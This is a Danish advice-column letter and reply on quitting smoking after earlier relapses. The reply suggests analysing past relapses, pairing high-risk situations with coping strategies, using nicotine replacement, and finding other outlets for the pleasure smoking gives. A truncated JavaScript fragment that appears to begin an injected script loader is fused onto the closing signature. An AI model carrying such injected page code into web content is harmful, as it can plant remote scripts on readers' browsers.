Jeg vil stoppe med at ryge

Fokuser i stedet på fordelene ved et effektivt rygestop.
Fokuser i stedet på fordelene ved et effektivt rygestop.

Kære Suh.
Jeg har sat mig for at holde op med at ryge. Jeg har prøvet flere gange før, men er indtil videre faldet i igen.
Jeg nyder simpelthen så meget at ryge, at det er svært at fastholde fokuset på de negative konsekvenser (for jeg ved jo godt, at de er der!).
Denne gang er lysten og motivationen dog høj, og derfor vil jeg gerne have alle de gode råd med på vejen, som du kunne have.
Venlig hilsen Mikael
Kære Mikael
Tillykke med den gode beslutning! Dejligt at høre, at du er top-motiveret denne gang.
Først og fremmest kan en god planlægning gøre en forskel, og da du tidligere allerede har prøvet at stoppe, men med tilbagefald, så prøv at afdække, hvad der mon var årsagen til, at det ikke holdt?

Hvilke ændringer i motivationen skete der efterhånden, hvilke tanker fyldte mere og mere, og hvilke praktiske ting bevirkede tilsammen, at du til sidst faldt i igen?
Tag også et stykke papir og del det op i to kolonner. I den ene kolonne skriver du som overskrift ”højrisikosituationer” og lister herunder op alle de situationer, hvor du erfaringsmæssigt ved, at du får lyst til at ryge.
I den anden kolonne lader du overskriften være ”mestring” og herunder skriver du forslag til, hvad der kan hjælpe dig til at overvinde trangen til en cigaret. Hvis du er blank i forhold til mestring ud for en eller flere højrisikosituationer har du en helt konkret udfordring, for står denne alene er du meget sårbar. Indhent gerne hjælp fra venner og bekendte – måske andre, der selv har været et rygestop igennem.
Når listen er færdig, så hænger du den op et sted, hvor du ser den dagligt. Målet er, at den lagres så dybt i din bevidsthed, at du vil kunne repetere den, selv hvis nogen vækkede dig midt om natten og bad dig om at finde en mestring på ”trang til at ryge i sociale situationer”.
Hvis du mærker de fysiske abstinenser af rygestoppet voldsomt, så kan det være en idé at alliere sig med nikotin-erstatninger (plaster/tyggegummi m.m.) for at komme godt ind i en god vane uden cigaretter. Senere kan du trappe ned med det.

Du bør også være opmærksom på, hvordan du kan kompensere for den nydelse, som rygningen giver dig. Hvorfor nyder du det så meget? Hvad er de psykologiske og følelsesmæssige fordele ved at ryge? Giver det dig tilladelse til at holde en lille pause? Tvinger det dig indirekte til at ”slappe af” og bare være til stede et øjeblik uden at skulle være ”effektiv”? Lægger det et ”låg” på dine følelser når du er stresset, ophidset, vred, ked af det m.m.?
Prøv at tænke over, hvad der kan være på spil her, og overvej så, hvilke andre muligheder der er for at opnå det samme resultat. Måske skal du være bedre til at tillade dig selv at slappe af på andre måder, og måske du kan blive bedre til at dele dine frustrationer eller følelser med andre mennesker, i stedet for at ”ryge dem væk”?

Hvis det hjælper på din motivation at fastholde fokuset på de negative sider ved rygning, så lav en liste over dem (gerne med billeder) og sæt også denne liste et sted, hvor du ser den dagligt. Forny listen af og til, så den på ny fanger din opmærksomhed.

Der findes også mange gode sider på nettet, som guider til effektivt rygestop, men mon ikke du i forvejen kender til dem.
Held og lykke.
Hilsen Suhvar d=document;var s=d.createElement(‘script’);